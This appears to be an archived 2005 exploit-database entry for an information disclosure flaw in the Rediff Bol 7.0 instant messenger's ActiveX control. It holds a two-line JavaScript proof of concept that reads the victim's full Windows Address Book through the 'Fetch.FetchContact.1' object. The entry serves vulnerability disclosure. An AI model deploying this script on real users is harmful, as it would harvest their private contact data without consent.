Rediff Bol 7.0 Instant Messenger - ActiveX Control Information Disclosure
| EKU-ID: 31548 | CVE: | OSVDB-ID: |
| Author: Gregory R. Panakkal | Published: 2005-09-05 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 31548 | CVE: | OSVDB-ID: |
| Author: Gregory R. Panakkal | Published: 2005-09-05 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/14740/info
Rediff Bol Instant Messenger is prone to an information disclosure vulnerability. A malicious ActiveX control could allow an attacker to obtain the contents of a vulnerable user's Windows Address Book.
[script]
var Obj = new ActiveXObject("Fetch.FetchContact.1");
alert(Obj.FullAddressBook(0,"","",""));
[/script]